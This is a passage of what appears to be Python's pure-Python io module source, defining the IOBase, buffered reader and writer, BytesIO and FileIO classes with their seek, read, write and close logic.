that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
with open('spam.txt', 'r') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an OSError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset pos. Argument pos is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Some operating systems / file systems could provide additional values.
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
try:
self.flush()
finally:
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
try:
closed = self.closed
except AttributeError:
# If getting closed fails, then the object is probably
# in an unusable state, so ignore.
return
if closed:
return
if _IOBASE_EMITS_UNRAISABLE:
self.close()
else:
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise OSError.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise OSError.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise OSError.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise a ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An OSError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, size=-1):
r"""Read and return a line of bytes from the stream.
If size is specified, at most size bytes will be read.
Size should be an int.
The line terminator is always b'\n' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if size >= 0:
n = min(n, size)
return n
else:
def nreadahead():
return 1
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
res = bytearray()
while size < 0 or len(res) < size:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
"""Write a list of lines to the stream.
Line separators are not added, so it is usual for each of the lines
provided to have a line separator at the end.
"""
self._checkClosed()
for line in lines:
self.write(line)
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if size is None:
size = -1
if size < 0:
return self.readall()
b = bytearray(size.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than the
length of b in bytes.
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, size=-1):
"""Read up to size bytes with at most one read() system call,
where size is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=False)
def readinto1(self, b):
"""Read bytes into buffer *b*, using at most one system call
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=True)
def _readinto(self, b, read1):
if not isinstance(b, memoryview):
b = memoryview(b)
b = b.cast('B')
if read1:
data = self.read1(len(b))
else:
data = self.read(len(b))
n = len(data)
b[:n] = data
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is always the length of b
in bytes.
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise OSError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise OSError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush on closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
modname = self.__class__.__module__
clsname = self.__class__.__qualname__
try:
name = self.name
except AttributeError:
return "<{}.{}>".format(modname, clsname)
else:
return "<{}.{} name={!r}>".format(modname, clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
if self.closed:
raise ValueError("getbuffer on closed file")
return memoryview(self._buffer)
def close(self):
if self._buffer is not None:
self._buffer.clear()
super().close()
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
if size < 0:
size = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + size)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, size=-1):
"""This is the same as read.
"""
return self.read(size)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with memoryview(b) as view:
n = view.nbytes # Size of any bytes-like object
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("unsupported whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def writable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
A buffer for a readable, sequential BaseRawIO object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise OSError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def readable(self):
return self.raw.readable()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, size=None):
"""Read size bytes.
Returns exactly size bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If size is negative, read until EOF or until read() would
block.
"""
if size is not None and size < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(size)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
if hasattr(self.raw, 'readall'):
chunk = self.raw.readall()
if chunk is None:
return buf[pos:] or None
else:
return buf[pos:] + chunk
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
chunk = self.raw.read()
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
chunk = self.raw.read(wanted)
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
# n is more than avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, size=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(size)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
current = self.raw.read(to_read)
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, size=-1):
"""Reads up to size bytes, with at most one read() system call."""
# Returns up to size bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if size < 0:
size = self.buffer_size
if size == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(size, len(self._read_buf) - self._read_pos))
# Implementing readinto() and readinto1() is not strictly necessary (we
# could rely on the base class that provides an implementation in terms of
# read() and read1()). We do it anyway to keep the _pyio implementation
# similar to the io implementation (which implements the methods for
# performance reasons).
def _readinto(self, buf, read1):
"""Read data into *buf* with at most one system call."""
# Need to create a memoryview object of type 'b', otherwise
# we may not be able to assign bytes to it, and slicing it
# would create a new object.
if not isinstance(buf, memoryview):
buf = memoryview(buf)
if buf.nbytes == 0:
return 0
buf = buf.cast('B')
written = 0
with self._read_lock:
while written < len(buf):
# First try to read from internal buffer
avail = min(len(self._read_buf) - self._read_pos, len(buf))
if avail:
buf[written:written+avail] = \
self._read_buf[self._read_pos:self._read_pos+avail]
self._read_pos += avail
written += avail
if written == len(buf):
break
# If remaining space in callers buffer is larger than
# internal buffer, read directly into callers buffer
if len(buf) - written > self.buffer_size:
n = self.raw.readinto(buf[written:])
if not n:
break # eof
written += n
# Otherwise refill internal buffer - unless we're
# in read1 mode and already got some data
elif not (read1 and written):
if not self._peek_unlocked(1):
break # eof
# In readinto1 mode, return as soon as we have some data
if read1 and written:
break
return written
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
if not raw.writable():
raise OSError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def writable(self):
return self.raw.writable()
def write(self, b):
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
if self.closed:
raise ValueError("write to closed file")
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer. (This may
# raise BlockingIOError with characters_written == 0.)
self._flush_unlocked()
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush on closed file")
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except BlockingIOError:
raise RuntimeError("self.raw should implement RawIOBase: it "
"should not raise BlockingIOError")
if n is None:
raise BlockingIOError(
errno.EAGAIN,
"write could not complete without blocking", 0)
if n > len(self._write_buf) or n < 0:
raise OSError("write() returned incorrect number of bytes")
del self._write_buf[:n]
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
def close(self):
with self._write_lock:
if self.raw is None or self.closed:
return
# We have to release the lock and call self.flush() (which will
# probably just re-take the lock) in case flush has been overridden in
# a subclass or the user set self.flush to something. This is the same
# behavior as the C implementation.
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
with self._write_lock:
self.raw.close()
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer, buffer_size=DEFAULT_BUFFER_SIZE):
"""Constructor.
The arguments are two RawIO instances.
"""
if not reader.readable():
raise OSError('"reader" argument must be readable.')
if not writer.writable():
raise OSError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, size=-1):
if size is None:
size = -1
return self.reader.read(size)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, size=0):
return self.reader.peek(size)
def read1(self, size=-1):
return self.reader.read1(size)
def readinto1(self, b):
return self.reader.readinto1(b)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
try:
self.writer.close()
finally:
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise OSError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, size=None):
if size is None:
size = -1
self.flush()
return BufferedReader.read(self, size)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, size=0):
self.flush()
return BufferedReader.peek(self, size)
def read1(self, size=-1):
self.flush()
return BufferedReader.read1(self, size)
def readinto1(self, b):
self.flush()
return BufferedReader.readinto1(self, b)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
class FileIO(RawIOBase):
_fd = -1
_created = False
_readable = False
_writable = False
_appending = False
_seekable = None
_closefd = True
def __init__(self, file, mode='r', closefd=True, opener=None):
"""Open a file. The mode can be 'r' (default), 'w', 'x' or 'a' for reading,
writing, exclusive creation or appending. The file will be created if it
doesn't exist when opened for writing or appending; it will be truncated
when opened for writing. A FileExistsError will be raised if it already
exists when opened for creating. Opening a file for creating implies
writing so this mode behaves in a similar way to 'w'. Add a '+' to the mode
to allow simultaneous reading and writing. A custom opener can be used by
passing a callable as *opener*. The underlying file descriptor for the file
object is then obtained by calling opener with (*name*, *flags*).
*opener* must return an open file descriptor (passing os.open as *opener*
results in functionality similar to passing None).
"""
if self._fd >= 0:
# Have to close the existing file first.
try:
if self._closefd:
os.close(self._fd)
finally:
self._fd = -1
if isinstance(file, float):
raise TypeError('integer argument expected, got float')
if isinstance(file, int):
fd = file
if fd < 0:
raise ValueError('negative file descriptor')
else:
fd = -1
if not isinstance(mode, str):
raise TypeError('invalid mode: %s' % (mode,))
if not set(mode) <= set('xrwab+'):
raise ValueError('invalid mode: %s' % (mode,))
if sum(c in 'rwax' for c in mode) != 1 or mode.count('+') > 1:
raise ValueError('Must have exactly one of create/read/write/append '
'mode and at most one plus')
if 'x' in mode:
self._created = True
self._writable = True
flags = os.O_EXCL | os.O_CREAT
elif 'r' in mode:
self._readable = True
flags = 0
elif 'w' in mode:
self._writable = True
flags = os.O_CREAT | os.O_TRUNC
elif 'a' in mode:
self._writable = True
self._appending = True
flags = os.O_APPEND | os.O_CREAT
if '+' in mode:
self._readable = True
self._writable = True
if self._readable and self._writable:
flags |= os.O_RDWR
elif self._readable:
flags |= os.O_RDONLY
else:
flags |= os.O_WRONLY
flags |= getattr(os, 'O_BINARY', 0)
noinherit_flag = (getattr(os, 'O_NOINHERIT', 0) or
getattr(os, 'O_CLOEXEC', 0))
flags |= noinherit_flag
owned_fd = None
try:
if fd < 0:
if not closefd:
raise ValueError('Cannot use closefd=False with file name')
if opener is None:
fd = os.open(file, flags, 0o666)
else:
fd = opener(file, flags)
if not isinstance(fd, int):
raise TypeError('expected integer from opener')
if fd < 0:
raise OSError('Negative file descriptor')
owned_fd = fd
if not noinherit_flag:
os.set_inheritable(fd, False)
self._closefd = closefd
fdfstat = os.fstat(fd)
try:
if stat.S_ISDIR(fdfstat.st_mode):
raise IsADirectoryError(errno.EISDIR,
os.strerror(errno.EISDIR), file)
except AttributeError:
# Ignore the AttribueError if stat.S_ISDIR or errno.EISDIR
# don't exist.
pass
self._blksize = getattr(fdfstat, 'st_blksize', 0)
if self._blksize <= 1:
self._blksize = DEFAULT_BUFFER_SIZE
if _setmode:
# don't translate newlines (\r\n <=> \n)
_setmode(fd, os.O_BINARY)
self.name = file
if self._appending:
# For consistent behaviour, we explicitly seek to the
# end of file (otherwise, it might be done only on the
# first write()).
os.lseek(fd, 0, SEEK_END)
except:
if owned_fd is not None:
os.close(owned_fd)
raise
self._fd = fd
def __del__(self):
if self._fd >= 0 and self._closefd and not self.closed:
import warnings
warnings.warn('unclosed file %r' % (self,), ResourceWarning,
stacklevel=2, source=self)
self.close()
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
class_name = '%s.%s' % (self.__class__.__module__,
self.__class__.__qualname__)
if self.closed:
return '<%s [closed]>' % class_name
try:
name = self.name
except AttributeError:
return ('<%s fd=%d mode=%r closefd=%r>' %
(class_name, self._fd, self.mode, self._closefd))
else:
return ('<%s name=%r mode=%r closefd=%r>' %
(class_name, name, self.mode, self._closefd))
def _checkReadable(self):
if not self._readable:
raise UnsupportedOperation('File not open for reading')
def _checkWritable(self, msg=None):
if not self._writable:
raise UnsupportedOperation('File not open for writing')
def read(self, size=None):
"""Read at most size bytes, returned as bytes.
Only makes one system call, so less data may be returned than requested
In non-blocking mode, returns None if no data is available.
Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
if size is None or size < 0:
return self.readall()
try:
return os.read(self._fd, size)
except BlockingIOError:
return None
def readall(self):
"""Read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
bufsize = DEFAULT_BUFFER_SIZE
try:
pos = os.lseek(self._fd, 0, SEEK_CUR)
end = os.fstat(self._fd).st_size
if end >= pos:
bufsize = end - pos + 1
except OSError:
pass
result = bytearray()
while True:
if len(result) >= bufsize:
bufsize = len(result)
bufsize += max(bufsize, DEFAULT_BUFFER_SIZE)
n = bufsize - len(result)
try:
chunk = os.read(self._fd, n)
except BlockingIOError:
if result:
break
return None
if not chunk: # reached the end of the file
break
result += chunk
return bytes(result)
def readinto(self, b):
"""Same as RawIOBase.readinto()."""
m = memoryview(b).cast('B')
data = self.read(len(m))
n = len(data)
m[:n] = data
return n
def write(self, b):
"""Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned. In non-blocking mode,
returns None if the write would block.
"""
self._checkClosed()
self._checkWritable()
try:
return os.write(self._fd, b)
except BlockingIOError:
return None
def seek(self, pos, whence=SEEK_SET):
"""Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
SEEK_SET or 0 (offset from start of file, offset should be >= 0); other values
are SEEK_CUR or 1 (move relative to current position, positive or negative),
and SEEK_END or 2 (move relative to end of file, usually negative, although
many platforms allow seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
if isinstance(pos, float):
raise TypeError('an integer is required')
self._checkClosed()
return os.lseek(self._fd, pos, whence)
def tell(self):
"""tell() -> int. Current file position.
Can raise OSError for non seekable files."""
self._checkClosed()
return os.lseek(self._fd, 0, SEEK_CUR)
def truncate(self, size=None):
"""Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is changed to the value of size.
"""
self._checkClosed()
self._checkWritable()
if size is None:
size = self.tell()
os.ftruncate(self._fd, size)
return size
def close(self):
"""Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error.
"""
if not self.closed:
try:
if self._closefd:
os.close(self._fd)
finally:
super().close()
def seekable(self):
"""True if file supports random-access."""
self._checkClosed()
if self._seekable is None:
try:
self.tell()
except OSError:
self._seekable = False
else:
self._seekable = True
return self._seekable
def readable(self):
"""True if file was opened in a read mode."""
self._checkClosed()
return self._readable
def writable(self):
"""True if file was opened in a write mode."""
self._checkClosed()
return self._writable
def fileno(self):
"""Return the underlying file descriptor (an integer)."""
self._checkClosed()
return self._fd
def isatty(self):
"""True if the file is connected to a TTY device."""
self._checkClosed()
return os.isatty(self._fd)
@property
def closefd(self):
"""True if the file descriptor will be closed by close()."""
return self._closefd
@property
def mode(self):
"""String giving the file mode"""
if self._created:
if self._readable:
return 'xb+'
else:
return 'xb'
elif self._appending:
if self._readable:
return 'ab+'
else:
return 'ab'
elif self._readable:
if self._writable:
return 'rb+'
else:
return 'rb'
else:
return 'wb'
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no public constructor.
"""
def read(self, size=-1):
"""Read at most size characters from stream, where size is an int.
Read from underlying buffer until we have size characters or we hit EOF.
If size is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
